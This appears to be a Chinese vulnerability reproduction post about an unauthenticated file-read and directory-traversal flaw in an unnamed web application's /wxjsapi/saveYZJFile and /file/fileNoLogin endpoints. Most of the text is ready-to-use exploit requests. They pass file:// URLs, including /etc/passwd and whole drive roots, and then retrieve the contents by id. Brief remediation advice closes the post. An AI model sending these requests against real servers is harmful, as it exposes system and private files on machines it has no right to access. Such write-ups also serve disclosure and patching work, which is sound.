漏洞影响版本
2018-2019多个版本
漏洞复现
第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串,如果响应为200返回包中含有No such file or directory则说明这是linux系统,需要使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt来获取id值
第二步:通过id值获取文件内容(/file/fileNoLogin/id) 1、使用/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,获取id值
2、通过查看文件接口访问 /file/fileNoLogin/id
3、downloadUrl参数填写目录的绝对路径时,可以造成目录遍历
访问D盘:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt
修复建议
1.关闭程序路由 /file/fileNoLogin
2.升级到最新版本
请登录后查看回复内容